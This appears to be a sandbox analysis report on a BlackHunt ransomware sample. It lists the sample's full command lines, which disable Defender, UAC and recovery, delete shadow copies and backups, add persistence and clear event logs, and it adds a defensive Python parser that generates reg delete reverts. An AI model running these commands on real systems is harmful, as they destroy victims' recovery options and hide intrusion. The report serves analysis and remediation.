PID 4756 wrote to memory of 2584 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 131
PID 4756 wrote to memory of 2584 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 131
PID 3416 wrote to memory of 4344 | 3416 | cmd.exe | 134
PID 3416 wrote to memory of 4344 | 3416 | cmd.exe | 134
PID 5004 wrote to memory of 2080 | 5004 | cmd.exe | 135
PID 5004 wrote to memory of 2080 | 5004 | cmd.exe | 135
PID 4756 wrote to memory of 2892 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 136
PID 4756 wrote to memory of 2892 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 136
PID 632 wrote to memory of 1884 | 632 | cmd.exe | 138
PID 632 wrote to memory of 1884 | 632 | cmd.exe | 138
PID 1692 wrote to memory of 4440 | 1692 | cmd.exe | 139
PID 1692 wrote to memory of 4440 | 1692 | cmd.exe | 139
PID 4756 wrote to memory of 2860 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 143
PID 4756 wrote to memory of 2860 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 143
PID 4856 wrote to memory of 4612 | 4856 | cmd.exe | 140
PID 4856 wrote to memory of 4612 | 4856 | cmd.exe | 140
PID 4756 wrote to memory of 4876 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 142
PID 4756 wrote to memory of 4876 | 4756 | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe | 142
System policy modification (1 TTP, 3 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" | 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe

Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

[1] C:\Users\Admin\AppData\Local\Temp\7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe (PID 4756)
    "C:\Users\Admin\AppData\Local\Temp\7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe"
    - UAC bypass
    - Checks computer location settings
    - Checks whether UAC is enabled
    - Enumerates connected drives
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification

  [2] C:\Windows\System32\cmd.exe (PID 2812)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 1320)
        reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f
        - Modifies registry class

  [2] C:\Windows\System32\cmd.exe (PID 1488)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 1976)
        reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        - Modifies registry class

  [2] C:\Windows\System32\cmd.exe (PID 224)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 3352)
        reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f
        - Modifies registry class

  [2] C:\Windows\System32\cmd.exe (PID 1072)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 3500)
        reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
        - Modifies registry class

  [2] C:\Windows\System32\cmd.exe (PID 1328)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 5048)
        reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
        - Adds Run key to start application

  [2] C:\Windows\System32\cmd.exe (PID 3252)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 3432)
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

  [2] C:\Windows\System32\cmd.exe (PID 2788)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 1820)
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
        - Modifies Windows Defender Real-time Protection settings

  [2] C:\Windows\System32\cmd.exe (PID 3416)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 4344)
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

  [2] C:\Windows\System32\cmd.exe (PID 2488)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 3760)
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

  [2] C:\Windows\System32\cmd.exe (PID 316)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 3940)
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

  [2] C:\Windows\System32\cmd.exe (PID 1692)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 4440)
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

  [2] C:\Windows\System32\cmd.exe (PID 4856)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 4612)
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

  [2] C:\Windows\System32\cmd.exe (PID 632)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 1884)
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

  [2] C:\Windows\System32\cmd.exe (PID 5004)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe (PID 2080)
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

  [2] C:\Windows\System32\cmd.exe (PID 2584)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 1456)
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

  [2] C:\Windows\System32\cmd.exe (PID 2892)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 3420)
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

  [2] C:\Windows\System32\cmd.exe (PID 4876)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 4920)
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

  [2] C:\Windows\System32\cmd.exe (PID 2860)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 4232)
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

  [2] C:\Windows\System32\cmd.exe (PID 4780)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 1964)
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

  [2] C:\Windows\System32\cmd.exe (PID 3572)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 3388)
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

  [2] C:\Windows\System32\cmd.exe (PID 5036)
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 940)
        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2300
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2708
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:5076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4396
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:3268
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:4336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4980
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2916
-
-
-
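Every `reg add` above is a policy value the sample writes to blind Defender (ThreatSeverityDefaultAction 6 is Defender's "Allow", so detections of that severity take no action and Notification_Suppress hides the fact), to take System Restore, WinRE and the Windows Backup UI away, and to lock the logged-on user out of Task Manager, Run, Log Off, Lock Workstation and Change Password. Reverting them is a matter of deleting the values, but first they have to be pulled out of the command lines. The parser below does that and emits the matching `reg delete`; it is an added example for this page, not code from the sample, from tria.ge or from any tool the report names. The catalogue of what each value does is the editor's own summary, the command lines in SAMPLE_CMDLINES are copied from the process tree on this page, and the HKCU deletes have to run in the victim user's session.

```python
"""Turn the `reg add` command lines above into (effect, revert command) pairs.

Added example, not part of the tria.ge report or of the sample. CATALOGUE is
the editor's own summary of each policy value the sample sets; the command
lines in SAMPLE_CMDLINES are copied from the process tree on this page.
"""
import re
from dataclasses import dataclass

HIVES = {"HKEY_LOCAL_MACHINE": "HKLM", "HKLM": "HKLM",
         "HKEY_CURRENT_USER": "HKCU", "HKCU": "HKCU"}
_DEF = "software\\policies\\microsoft\\windows defender\\"
_POL = "software\\policies\\microsoft\\windows"
_SYS = "software\\microsoft\\windows\\currentversion\\policies\\system\\"
_EXP = "software\\microsoft\\windows\\currentversion\\policies\\explorer\\"
# "<key path>\<value name>", lower-case, hive stripped -> effect of a non-zero setting
CATALOGUE = {
    _DEF + "ux configuration\\notification_suppress": "Defender: user notifications suppressed",
    _POL + " nt\\systemrestore\\disablesr": "System Restore turned off",
    _POL + " nt\\systemrestore\\disableconfig": "System Restore configuration UI hidden",
    _POL + "\\winre\\disablesetup": "Windows Recovery Environment setup disabled",
    _SYS + "disabletaskmgr": "Task Manager blocked",
    _SYS + "disablelockworkstation": "Lock Workstation removed from Ctrl+Alt+Del",
    _SYS + "disablechangepassword": "Change Password removed from Ctrl+Alt+Del",
    _SYS + "nologoff": "Log Off removed from Ctrl+Alt+Del",
    _SYS + "legalnoticecaption": "Logon banner caption replaced by the ransom note",
    _SYS + "legalnoticetext": "Logon banner text replaced by the ransom note",
    _EXP + "norun": "Run command removed",
    _EXP + "noclose": "Shut Down removed from the Start menu",
    _EXP + "startmenulogoff": "Log Off removed from the Start menu",
}
for _sev in ("low", "medium", "high", "severe"):
    CATALOGUE[_DEF + "threats\\threatseveritydefaultaction\\" + _sev] = \
        "Defender: %s-severity detections set to 6 = Allow (no action)" % _sev
for _ui in ("disablebackuplauncher", "disablerestoreui", "disablesystembackupui", "disablebackupui"):
    CATALOGUE[_POL + "\\backup\\client\\" + _ui] = "Windows Backup UI hidden"
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')

def tokenize(cmdline):
    """Split on whitespace honouring double quotes; no backslash escaping, so
    registry paths and `/d "free text "` stay whole."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN.finditer(cmdline)]

@dataclass
class RegWrite:
    hive: str
    path: str
    value: str
    vtype: str
    data: str

def parse_reg_add(cmdline):
    """The write a `reg add` line performs, or None (cmd.exe /c wrappers are fine)."""
    toks = tokenize(cmdline)
    low = [t.lower() for t in toks]
    for i in range(len(toks) - 2):
        if low[i].rsplit("\\", 1)[-1] in ("reg", "reg.exe") and low[i + 1] == "add":
            break
    else:
        return None
    hive_name, _, path = toks[i + 2].partition("\\")
    if hive_name.upper() not in HIVES:
        return None
    opts = {"/v": "", "/t": "REG_SZ", "/d": ""}  # reg add defaults
    j = i + 3
    while j + 1 < len(toks):
        if low[j] in opts:
            opts[low[j]] = toks[j + 1]
            j += 1
        j += 1
    return RegWrite(HIVES[hive_name.upper()], path, opts["/v"], opts["/t"].upper(), opts["/d"])

def effect(w):
    return CATALOGUE.get(f"{w.path}\\{w.value}".lower())

def is_lockout(w):
    """Catalogued value set to anything but 0. The sample's own clean-up near the
    end of the tree (NoRun and DisableTaskMgr back to 0) is therefore not flagged."""
    return effect(w) is not None and w.data.strip() not in ("", "0")

def revert_command(w):
    """Deleting a policy value returns it to 'Not configured'. HKCU entries must be
    removed in the victim user's session (or under HKU\\<SID>), not an admin's."""
    return f'reg delete "{w.hive}\\{w.path}" /v "{w.value}" /f'

def triage(cmdlines):
    """(effect, revert command) for every lockout write in the input."""
    writes = (parse_reg_add(c) for c in cmdlines)
    return [(effect(w), revert_command(w)) for w in writes if w and is_lockout(w)]

SAMPLE_CMDLINES = [  # copied from the process tree on this page
    r'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f',
    r'"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f',
    r'REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f',
    r'reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f',
    r'vssadmin.exe Delete Shadows /all /quiet',
]

if __name__ == "__main__":
    print(*("%s\n    %s" % pair for pair in triage(SAMPLE_CMDLINES)), sep="\n")
```

Feed it the CommandLine field of Sysmon event 1 or 4688 records and you get a remediation list instead of a wall of `reg add` lines. Both the cmd.exe wrapper and the reg.exe child yield the same write, so dedupe on the (hive, path, value) triple before running the deletes.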
  C:\Windows\System32\cmd.exe  (depth 2, PID 2076)
    "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe" /F
    C:\Windows\system32\schtasks.exe  (depth 3, PID 2904)
      SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe" /F
      - Creates scheduled task(s)
  C:\Windows\System32\cmd.exe  (depth 2, PID 3768)
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
    C:\Windows\system32\vssadmin.exe  (depth 3, PID 1820)
      vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
      - Enumerates connected drives
      - Interacts with shadow copies
  C:\Windows\System32\cmd.exe  (depth 2, PID 1584)
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    C:\Windows\system32\vssadmin.exe  (depth 3, PID 4444)
      vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
      - Enumerates connected drives
      - Interacts with shadow copies
  C:\Windows\System32\cmd.exe  (depth 2, PID 5052)
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    C:\Windows\system32\vssadmin.exe  (depth 3, PID 6132)
      vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
      - Interacts with shadow copies
  C:\Windows\System32\cmd.exe  (depth 2, PID 3940)
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    C:\Windows\system32\vssadmin.exe  (depth 3, PID 6120)
      vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
      - Interacts with shadow copies
  C:\Windows\System32\cmd.exe  (depth 2, PID 3092)
    "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
    C:\Windows\system32\vssadmin.exe  (depth 3, PID 4548)
      vssadmin.exe Delete Shadows /all /quiet
      - Interacts with shadow copies
  C:\Windows\System32\cmd.exe  (depth 2, PID 2736)
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
    C:\Windows\system32\bcdedit.exe  (depth 3, PID 6140)
      bcdedit /set {default} recoveryenabled No
      - Modifies boot configuration data using bcdedit
  C:\Windows\System32\cmd.exe  (depth 2, PID 1568)
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    C:\Windows\system32\bcdedit.exe  (depth 3, PID 548)
      bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      - Modifies boot configuration data using bcdedit
  C:\Windows\System32\cmd.exe  (depth 2, PID 3504)
    "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    C:\Windows\system32\fsutil.exe  (depth 3, PID 3064)
      fsutil.exe usn deletejournal /D C:
      - Deletes NTFS Change Journal
  C:\Windows\System32\cmd.exe  (depth 2, PID 2472)
    "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    C:\Windows\system32\schtasks.exe  (depth 3, PID 5400)
      schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  C:\Windows\System32\cmd.exe  (depth 2, PID 4120)
    "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    C:\Windows\System32\Conhost.exe  (depth 3, PID 3420)
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    C:\Windows\system32\wbadmin.exe  (depth 3, PID 5372)
      wbadmin.exe delete catalog -quiet
      - Deletes backup catalog
  C:\Windows\System32\cmd.exe  (depth 2, PID 6052)
    "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
    C:\Windows\system32\fsutil.exe  (depth 3, PID 4636)
      fsutil usn deletejournal /D F:\
      - Enumerates connected drives
  C:\Windows\System32\cmd.exe  (depth 2, PID 3384)
    "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
    C:\Windows\system32\fsutil.exe  (depth 3, PID 3340)
      fsutil usn deletejournal /D C:\
  C:\Windows\System32\cmd.exe  (depth 2, PID 3632)
    "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
    C:\Windows\system32\fsutil.exe  (depth 3, PID 3576)
      fsutil usn deletejournal /D M:\
      - Enumerates connected drives
  C:\Windows\System32\cmd.exe  (depth 2, PID 960)
    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
    C:\Windows\system32\wevtutil.exe  (depth 3, PID 1384)
      wevtutil.exe cl Setup
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\cmd.exe  (depth 2, PID 4292)
    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
    C:\Windows\system32\wevtutil.exe  (depth 3, PID 5048)
      wevtutil.exe cl System
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\cmd.exe  (depth 2, PID 5976)
    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
    C:\Windows\system32\wevtutil.exe  (depth 3, PID 4268)
      wevtutil.exe cl Application
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\cmd.exe  (depth 2, PID 5896)
    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
    C:\Windows\system32\wevtutil.exe  (depth 3, PID 816)
      wevtutil.exe cl Security
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\cmd.exe  (depth 2, PID 4828)
    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
    C:\Windows\system32\wevtutil.exe  (depth 3, PID 3208)
      wevtutil.exe cl Security /e:false
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
